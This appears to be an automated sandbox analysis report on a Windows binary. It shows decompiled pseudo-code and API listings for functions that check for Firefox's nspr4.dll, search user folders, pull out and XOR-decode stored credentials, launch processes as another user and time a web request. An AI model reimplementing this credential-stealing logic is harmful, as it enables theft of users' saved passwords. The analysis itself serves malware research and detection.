        				struct HINSTANCE__* _t11;
        				void* _t18;
        				signed int _t25;
        				short* _t33;
        				void* _t43;
        
        				_t11 = __eax;
        				_t33 = __eax;
        				if( *0x41e7fc > 1) {
        					_t11 = GetModuleHandleW(L"nspr4.dll");
        					if(_t11 != 0) {
        						if(_t33 == 0 ||  *_t33 == 0) {
        							return E00418993(__eflags, 0);
        						}
        						_t11 = E004110EE(2 + E00411C55(_t33) * 4);
        						_t31 = _t11;
        						if(_t11 != 0) {
        							_t25 = E00411F5D(E00412012(_t33, _t31) | 0xffffffff, _t31,  &_v20);
        							_t11 = E00411106(_t31);
        							if(_t25 != 0) {
        								_t18 = 0x31;
        								E0040C9FD(_t18,  &_v108);
        								_t43 = E00411ECA( &_v8,  &_v108, _v20);
        								_t11 = E00411F4B( &_v20);
        								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
        								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
        									E00418993(_t44, _v8);
        									return E00411106(_v8);
        								}
        							}
        						}
        					}
        				}
        				return _t11;
        			}














        APIs
        • GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 00418C1E
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
          • Part of subcall function 00418993: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004189BA
          • Part of subcall function 00418993: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00418A0E
          • Part of subcall function 00418993: GetPrivateProfileIntW.KERNEL32 ref: 00418A71
          • Part of subcall function 00418993: GetPrivateProfileStringW.KERNEL32 ref: 00418A9D
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
        • String ID: nspr4.dll$d@
        • API String ID: 119068519-1452026018
        • Opcode ID: 20ac1bb5338b2b7268e84e8d31e5203c06fafa6946666a3ee6e8c21c10b9eb3c
        • Instruction ID: 2303ccad1aba290fcd0c21eef99642f97d050a6df1e30f088edfea582909824f
        • Opcode Fuzzy Hash: 20ac1bb5338b2b7268e84e8d31e5203c06fafa6946666a3ee6e8c21c10b9eb3c
        • Instruction Fuzzy Hash: 8811E331A0221466CB1177764D06BDEA6A95F90344F14052FBA11A32A1FF6C898591AD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 63%
        			E00415608(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
        				signed int _v14;
        				signed int _v16;
        				signed int _v20;
        				char _v284;
        				unsigned int _t24;
        				void* _t26;
        				signed int _t28;
        				signed int* _t29;
        				void* _t30;
        				void* _t41;
        				char* _t42;
        				void* _t45;
        				signed int _t46;
        				void* _t47;
        
        				_t45 = __ecx;
        				_t24 = E00411142( &_v20, _a4, 0x10);
        				_v20 = _v20 ^ _t24;
        				_v16 = _v16 ^ _t24;
        				_v14 = _v14 ^ _t24 >> 0x00000010;
        				_t41 = 0;
        				_t26 = 0;
        				do {
        					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
        					_t26 = _t26 + 1;
        					if(_t26 == 4) {
        						_t26 = 0;
        					}
        					_t41 = _t41 + 1;
        				} while (_t41 < 8);
        				if(_a12 != 0) {
        					E00411142( &_v284, _a12, 0x102);
        					E00412582( &_v284, _t41,  &_v20, 0x10);
        				}
        				_t28 = _a16 & 0x000000ff;
        				if(_t28 != 0) {
        					_t30 = _t28 - 1;
        					if(_t30 == 0) {
        						_t42 =  &M004046E8;
        						_push(6);
        						goto L11;
        					} else {
        						if(_t30 == 1) {
        							_t42 = L"Global\\";
        							_push(7);
        							L11:
        							_pop(_t46);
        							E004114A7(_t46, _t42, _t45);
        							_t45 = _t45 + _t46 * 2;
        						}
        					}
        				}
        				_t29 =  &_v20;
        				__imp__StringFromGUID2(_t29, _t45, 0x28);
        				return _t29;
        			}


















        APIs
        • StringFromGUID2.OLE32(00000000,?,00000028,004069F7,?,00000010,00000000,77E49EB0), ref: 004156A9
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: FromString
        • String ID: Global\$Local\
        • API String ID: 1694596556-639276846
        • Opcode ID: 29453d769c25f62165110c0e8fac43e791a76e75076e42e2c9010803fcb1340c
        • Instruction ID: 70d199f6801cb4304bbaad5819879d2adcae6ae0084c1896f1dc8b0c447dc8f5
        • Opcode Fuzzy Hash: 29453d769c25f62165110c0e8fac43e791a76e75076e42e2c9010803fcb1340c
        • Instruction Fuzzy Hash: 6A11E23264021DA6CB14DFB58C06BEF7769EB85704F40882BE246E6181DABC8585C798
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040B5A8(void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v52;
        				char _v572;
        				void* __edi;
        				void* __esi;
        				char* _t22;
        				signed int _t30;
        				char* _t32;
        				void* _t34;
        
        				_t32 =  &_v52;
        				E0040CA33(0x81, _t32);
        				_v16 = _t32;
        				_v28 = 0x26;
        				_v24 = 0x1a;
        				_v20 = 0x23;
        				E004111B9( &_v12,  &_v12, 0, 8);
        				_t30 = 0;
        				do {
        					_t22 =  &_v572;
        					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
        					_t37 = _t22;
        					if(_t22 == 0) {
        						_t29 =  &_v16;
        						E004165E9( &_v572,  &_v16, _t37, 1, 2, E0040B30D,  &_v12, 0, 0, 0);
        					}
        					_t30 = _t30 + 1;
        				} while (_t30 < 3);
        				if(_v8 <= 0) {
        					return E00411106(_v12);
        				}
        				return E004095BC(_t29, _v12, 0xcb);
        			}


















        APIs
        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008,?,00000000), ref: 0040B5F8
          • Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
          • Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
          • Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
          • Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
          • Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
          • Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
        • String ID: #$&
        • API String ID: 3438805939-3870246384
        • Opcode ID: a0f1d527801865b438fc3755597731cac7b9170a07408ee9eae431d384b2bba4
        • Instruction ID: a9ead894ba9afed554aa2ce461dd0d36e112f055b3b1163deb0491a57a8ba65d
        • Opcode Fuzzy Hash: a0f1d527801865b438fc3755597731cac7b9170a07408ee9eae431d384b2bba4
        • Instruction Fuzzy Hash: EC11A371A01128BADB209B91DC09FDF7A7CEF41304F00406AB505B6180D7785B46CBD9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040BEC9(void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v60;
        				char _v580;
        				void* __edi;
        				void* __esi;
        				char* _t22;
        				signed int _t30;
        				char* _t32;
        				void* _t34;
        
        				_t32 =  &_v60;
        				E0040CA33(0x95, _t32);
        				_v16 = _t32;
        				_v28 = 0x26;
        				_v24 = 0x1a;
        				_v20 = 0x23;
        				E004111B9( &_v12,  &_v12, 0, 8);
        				_t30 = 0;
        				do {
        					_t22 =  &_v580;
        					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
        					_t37 = _t22;
        					if(_t22 == 0) {
        						_t29 =  &_v16;
        						E004165E9( &_v580,  &_v16, _t37, 1, 2, E0040BC3A,  &_v12, 0, 0, 0);
        					}
        					_t30 = _t30 + 1;
        				} while (_t30 < 3);
        				if(_v8 <= 0) {
        					return E00411106(_v12);
        				}
        				return E004095BC(_t29, _v12, 0xcb);
        			}


















        APIs
        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008,?,00000000), ref: 0040BF19
          • Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
          • Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
          • Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
          • Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
          • Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
          • Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
        • String ID: #$&
        • API String ID: 3438805939-3870246384
        • Opcode ID: 8eec85e84f672fb8cbcd655b8471676eb07b983db8c4076936cc61ba4711a21b
        • Instruction ID: aadd2444d570a0828405d74e42602f256bfa55a719a741fa1eff2a01cfabb311
        • Opcode Fuzzy Hash: 8eec85e84f672fb8cbcd655b8471676eb07b983db8c4076936cc61ba4711a21b
        • Instruction Fuzzy Hash: AE11A076A01128BADB209B92DC49BDFBE78EF45744F00406AB605B7190D3785A86CBE9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E00406FCD(void* __eflags) {
        				signed int _v8;
        				char _v20;
        				char _v44;
        				char _v92;
        				void* __edi;
        				void* __esi;
        				void* _t17;
        				CHAR* _t27;
        				intOrPtr* _t28;
        				WCHAR* _t30;
        				struct HINSTANCE__* _t31;
        
        				_t30 =  &_v44;
        				E0040CA33(0xe3, _t30);
        				_t31 = GetModuleHandleW(_t30);
        				if(_t31 != 0) {
        					_t27 =  &_v20;
        					E0040C9FD(0xe4, _t27);
        					_t28 = GetProcAddress(_t31, _t27);
        					if(_t28 == 0) {
        						L4:
        						_t17 = 0;
        						L6:
        						return _t17;
        					}
        					_v8 = _v8 & 0x00000000;
        					_t32 =  &_v92;
        					E0040CA33(0xd5,  &_v92);
        					_push(0x1e6);
        					_push("0x5B8321CD");
        					if(E00411E74( &_v8, _t32, 0x200099a) > 0) {
        						 *_t28(0, _v8, "#", 0x10040);
        						E00411106(_v8);
        						_t17 = 1;
        						goto L6;
        					}
        					goto L4;
        				}
        				return 0;
        			}















        APIs
        • GetModuleHandleW.KERNEL32(?), ref: 00406FE4
        • GetProcAddress.KERNEL32(00000000,?), ref: 00407006
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: 0x5B8321CD
        • API String ID: 1646373207-92132254
        • Opcode ID: 0508da6be3c01fe22df0d1653f8c5c1631b7a33b5eae172ffc601901fbffc4e8
        • Instruction ID: d3cb757bb58486d5b1cfdb95b6470c9554b71bca8d26180f98683687bf149e7b
        • Opcode Fuzzy Hash: 0508da6be3c01fe22df0d1653f8c5c1631b7a33b5eae172ffc601901fbffc4e8
        • Instruction Fuzzy Hash: 2901D276E04355B7EB2067AA8C06BCF7B689F40710F000176FA01F72D1D97CAA0295A9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00414BB4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				short _v524;
        				void* __esi;
        				WCHAR* _t17;
        				intOrPtr _t25;
        				int _t27;
        
        				_t27 = 0;
        				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041621B( &_v524) != 0) {
        					_t17 = PathFindFileNameW( &_v524);
        					_t25 = _a4;
        					E00411285(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
        					E00411142(_t25, "?T", 2);
        					 *((char*)(_t25 + 2)) = 0x5c;
        					_t27 = 1;
        				}
        				return _t27;
        			}









        APIs
        • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00414BD6
          • Part of subcall function 0041621B: SetFileAttributesW.KERNEL32(00000080,00000080,00418BFB,?), ref: 00416224
          • Part of subcall function 0041621B: DeleteFileW.KERNEL32(?), ref: 0041622E
        • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00414BF8
          • Part of subcall function 00411285: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00411F7D,00000000,00000000,00000000,004112E2,00000000,00000000,00000000,?,00000000), ref: 004112A0
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
        • String ID: cab
        • API String ID: 2491076439-1787492089
        • Opcode ID: ce7f8fcd84bfd3ee5d14bd223d0f5135981f21d27ce70b6ddb05084b2f680cbb
        • Instruction ID: 3d9dd9b4d726a2925937594f3ab0dd0e8ef9208457da84a01e1c4499534990d6
        • Opcode Fuzzy Hash: ce7f8fcd84bfd3ee5d14bd223d0f5135981f21d27ce70b6ddb05084b2f680cbb
        • Instruction Fuzzy Hash: 6D01DB7260021467CB50ABB8DC0EFC7B7AC9F45754F0047657965F31D1E7B8D94486D4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 84%
        			E00404C8B(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
        				void* _t13;
        				void** _t24;
        				void* _t27;
        
        				_t13 = _a4(_a8,  &_a8);
        				if(_t13 != 0) {
        					_t24 = E004146CF(__ecx, _a8);
        					if(_t24 != 0) {
        						if(EqualSid( *_t24, _a12) != 0) {
        							_t27 = _a8;
        							if(E00411E74( &_a4, L"\"%s\"", _a16) > 0) {
        								E00412A28(_t27, _a4);
        								E00411106(_a4);
        							}
        						}
        						E00411106(_t24);
        					}
        					return CloseHandle(_a8);
        				}
        				return _t13;
        			}







        APIs
          • Part of subcall function 004146CF: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0), ref: 004146E8
          • Part of subcall function 004146CF: GetLastError.KERNEL32(?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0,?,?,00000000), ref: 004146EE
          • Part of subcall function 004146CF: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0), ref: 00414714
        • EqualSid.ADVAPI32(00000000,0000000C,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CB0
          • Part of subcall function 00412A28: LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00412A39
          • Part of subcall function 00412A28: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412A58
          • Part of subcall function 00412A28: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00412A64
          • Part of subcall function 00412A28: CreateProcessAsUserW.ADVAPI32(?,00000000,00404CDF,00000000,00000000,00000000,00404CDF,00404CDF,00000000,?,?,?,00000000,00000044), ref: 00412AD5
          • Part of subcall function 00412A28: CloseHandle.KERNEL32(?), ref: 00412AE8
          • Part of subcall function 00412A28: CloseHandle.KERNEL32(?), ref: 00412AED
          • Part of subcall function 00412A28: FreeLibrary.KERNEL32(?), ref: 00412B04
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • CloseHandle.KERNEL32(?,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CF1
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
        • String ID: "%s"
        • API String ID: 4035272744-3297466227
        • Opcode ID: 1ef3b37d8beab4da1141fc67d2ccdca75d2cb605036490efaf0c00bc02c4a111
        • Instruction ID: cf9fe193b0d28ddb65bb5a05327f71cb5d09876007578edd5e84f994a25b6d4d
        • Opcode Fuzzy Hash: 1ef3b37d8beab4da1141fc67d2ccdca75d2cb605036490efaf0c00bc02c4a111
        • Instruction Fuzzy Hash: D0F06D75100109BBDF127F62DD05EDE3B69EF84395B118036FE08A5171DB39CA60DB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004131CF(intOrPtr __eax, void* __eflags) {
        				long _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				char* _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				char _v56;
        				void* __edi;
        				intOrPtr _t18;
        				intOrPtr _t26;
        
        				_v56 = 0x201;
        				_v52 = 2;
        				_v48 = __eax;
        				_t18 = E0041314E();
        				_t26 = 0;
        				_v44 = _t18;
        				_v40 = "http://www.internic.net/images/internic.gif";
        				_v36 = 0;
        				_v32 = 0;
        				_v28 = 0;
        				_v24 = 0;
        				_v20 = 0;
        				_v16 = 0x80000;
        				_v12 = 0;
        				_v8 = GetTickCount();
        				if(E0041301C( &_v56, 0) != 0) {
        					_t26 = GetTickCount() - _v8;
        				}
        				E00411106(_v44);
        				return _t26;
        			}




















        APIs
          • Part of subcall function 0041314E: LoadLibraryA.KERNEL32(urlmon.dll,?), ref: 0041315F
          • Part of subcall function 0041314E: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413172
          • Part of subcall function 0041314E: FreeLibrary.KERNEL32(00000030), ref: 004131C4
        • GetTickCount.KERNEL32 ref: 00413218
          • Part of subcall function 0041301C: WaitForSingleObject.KERNEL32(?,?,?,00000000,?), ref: 00413070
          • Part of subcall function 0041301C: InternetCloseHandle.WININET(00000000), ref: 00413109
        • GetTickCount.KERNEL32 ref: 0041322A
        Strings
        • http://www.internic.net/images/internic.gif, xrefs: 004131F8
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
        • String ID: http://www.internic.net/images/internic.gif
        • API String ID: 2673491915-804674498
        • Opcode ID: fa0d0d477034366977dc602024fa31134b5d98f682c958b342de780ba87912ae
        • Instruction ID: c2dd074b03a21ad8f51d46e4fa51465cc8a7e283ff1f4f8df0e2a3bb1848b2fc
        • Opcode Fuzzy Hash: fa0d0d477034366977dc602024fa31134b5d98f682c958b342de780ba87912ae
        • Instruction Fuzzy Hash: E701A8B1D11228AACF00EFE9D9455DEFBF8BF08758F10415BE900B7211D3B55A458BE9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041545F(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, char _a20) {
        				char _v524;
        				void* _t21;
        
        				_t21 = 0;
        				while(1) {
        					_t3 =  &_a20; // 0x4056ed
        					E0041532E( *_t3, 4, 0, _a4,  &_v524);
        					if(E00416745( &_v524, _a12, _a8) != 0 && (_a16 == 0 || PathAddExtensionW(_a12, _a16) != 0) && GetFileAttributesW(_a12) == 0xffffffff) {
        						break;
        					}
        					_t21 = _t21 + 1;
        					if(_t21 < 0x64) {
        						continue;
        					}
        					return 0;
        				}
        				return 1;
        			}






        APIs
          • Part of subcall function 0041532E: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • PathAddExtensionW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 004154A0
        • GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 004154AD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$AttributesCharCombineExtensionFileUpper
        • String ID: V@
        • API String ID: 1608718705-2114727902
        • Opcode ID: fb7141be85fb6e57be85ca8ec5a88ce99e1d45592317557dcc89e3ca557a873a
        • Instruction ID: dde51da065c57adcb789e99021a9460111f29a9139ff284d100384937bc0ff37
        • Opcode Fuzzy Hash: fb7141be85fb6e57be85ca8ec5a88ce99e1d45592317557dcc89e3ca557a873a
        • Instruction Fuzzy Hash: A9F0AF35000A19DBDF115F20DC08BDB3B69AB41315F004266BC66A22B1C639C9E6DBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0040BC3A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				char _v524;
        				char _v576;
        				char _v580;
        				char _v588;
        				intOrPtr _v608;
        				char _v612;
        				char _v620;
        				char _v628;
        				char _v632;
        				char* _v640;
        				signed int _v644;
        				char* _v648;
        				char** _v652;
        				intOrPtr _v656;
        				intOrPtr _v660;
        				char* _v664;
        				char* _v668;
        				char* _v672;
        				char* _v676;
        				void* __edi;
        				void* __esi;
        				signed int _t82;
        				char* _t83;
        				intOrPtr _t85;
        				char** _t101;
        				char* _t112;
        				char* _t121;
        				char* _t122;
        				void* _t123;
        				char* _t126;
        				char* _t127;
        				char* _t156;
        				void* _t157;
        				signed int _t166;
        				char* _t167;
        				char** _t168;
        				intOrPtr _t170;
        				char* _t171;
        				signed int _t172;
        				void* _t174;
        
        				_t174 = (_t172 & 0xfffffff8) - 0x294;
        				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L31:
        					return 1;
        				}
        				_t177 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_push( &_v524);
        					_t82 = 2;
        					_t83 = E004160D5(_t82,  &_v524,  &_v612);
        					__eflags = _t83;
        					if(_t83 == 0) {
        						goto L31;
        					}
        					_t85 = E004119A1(_v608,  &_v652, _v612, 1, 0);
        					_v660 = _t85;
        					__eflags = _t85 - 0xffffffff;
        					if(_t85 == 0xffffffff) {
        						L30:
        						E0041617D( &_v612);
        						goto L31;
        					}
        					_v640 = E004110D6(0x622);
        					E0040C9FD(0x91,  &_v588);
        					E0040C9FD(0x92,  &_v628);
        					E0040C9FD(0x93,  &_v620);
        					E0040C9FD(0x94,  &_v576);
        					__eflags = _v640;
        					if(_v640 == 0) {
        						L29:
        						E00411106(_v640);
        						E00411122(_v652, _v656);
        						goto L30;
        					}
        					_v644 = 0;
        					__eflags = _v648;
        					if(_v648 > 0) {
        						do {
        							_t166 = _v644;
        							_t101 = _v652;
        							__eflags =  *(_t101 + _t166 * 4);
        							if( *(_t101 + _t166 * 4) == 0) {
        								goto L28;
        							}
        							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
        							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
        							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
        							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
        							__eflags = _v676;
        							_t167 = _t112;
        							if(_v676 == 0) {
        								goto L28;
        							}
        							__eflags = _v672;
        							if(_v672 == 0) {
        								goto L28;
        							}
        							__eflags = _t167;
        							if(_t167 == 0) {
        								goto L28;
        							}
        							_v676 =  &(_v676[8]);
        							_v672 =  &(_v672[6]);
        							_t168 =  &(_t167[0xa]);
        							_v652 = _t168;
        							E0040BC20();
        							E0040BC20();
        							E0040BC20();
        							__eflags = _t156;
        							if(_t156 == 0) {
        								L15:
        								_t157 = 0x15;
        								L16:
        								__eflags =  *_v676;
        								if( *_v676 == 0) {
        									goto L28;
        								}
        								__eflags =  *_v672;
        								if( *_v672 == 0) {
        									goto L28;
        								}
        								_t121 =  *_t168;
        								__eflags = _t121;
        								if(_t121 == 0) {
        									goto L28;
        								}
        								__eflags = _t121 - 0x30;
        								if(_t121 == 0x30) {
        									L21:
        									__eflags = _t168[0];
        									if(_t168[0] == 0) {
        										goto L28;
        									}
        									L22:
        									_t122 = 0;
        									__eflags =  *_t168;
        									if( *_t168 == 0) {
        										goto L28;
        									} else {
        										goto L23;
        									}
        									do {
        										L23:
        										_t122[_t168] = _t122[_t168] ^ 0x00000019;
        										_t122 =  &(_t122[1]);
        										__eflags = _t122[_t168];
        									} while (_t122[_t168] != 0);
        									__eflags = _t122;
        									if(_t122 > 0) {
        										_t169 =  &_v580;
        										_t123 = 0x57;
        										E0040CA33(_t123,  &_v580);
        										_push(_t157);
        										_push(_v676);
        										_t158 = _v656;
        										_push(_v652);
        										_push(_v672);
        										_t126 = E00411DF9(_t169, 0x311, _v656, _t169);
        										_t174 = _t174 + 0x14;
        										__eflags = _t126;
        										if(_t126 > 0) {
        											_t170 = _a4;
        											_t127 = E004114FA(_t126, _t170, _t158);
        											__eflags = _t127;
        											if(_t127 != 0) {
        												_t68 = _t170 + 4;
        												 *_t68 =  &(( *(_t170 + 4))[1]);
        												__eflags =  *_t68;
        											}
        										}
        									}
        									goto L28;
        								}
        								__eflags = _t121 - 0x31;
        								if(_t121 != 0x31) {
        									goto L22;
        								}
        								goto L21;
        							}
        							_v648 =  &(_t156[6]);
        							E0040BC20();
        							_t157 = E00411785(_v648,  &_v588, 0);
        							__eflags = _t157 - 1;
        							if(_t157 < 1) {
        								goto L15;
        							}
        							__eflags = _t157 - 0xffff;
        							if(_t157 <= 0xffff) {
        								goto L16;
        							}
        							goto L15;
        							L28:
        							_v644 = _v644 + 1;
        							__eflags = _v644 - _v648;
        						} while (_v644 < _v648);
        					}
        					goto L29;
        				} else {
        					_t171 =  &_v612;
        					E0040CA33(0x90, _t171);
        					_v648 = _t171;
        					E004165E9( &_v524,  &_v648, _t177, 1, 5, E0040BC3A, _a4, 0, 0, 0);
        					goto L31;
        				}
        			}












































        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040BD60
        • StrStrIA.SHLWAPI(?,?), ref: 0040BD72
        • StrStrIA.SHLWAPI(?,?), ref: 0040BD82
        • StrStrIA.SHLWAPI(?,?), ref: 0040BD94
          • Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
          • Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
          • Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
          • Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
          • Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
          • Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
        • String ID:
        • API String ID: 1075381090-0
        • Opcode ID: 72af5f7acfc866ccc90672fae6265cf7eb00e94ca1a820a1f36c04653f9209d6
        • Instruction ID: 00657bf3aa9e71601cb84c5bec774a2fc10a527ec8ab6a54d6a56c263e9ad6ae
        • Opcode Fuzzy Hash: 72af5f7acfc866ccc90672fae6265cf7eb00e94ca1a820a1f36c04653f9209d6
        • Instruction Fuzzy Hash: 9B715B715083419FD721DF25C841A9BB7E5EF84704F00492EFA94A72E2D738D946CBDA
        Uniqueness

        Uniqueness Score: -1.00%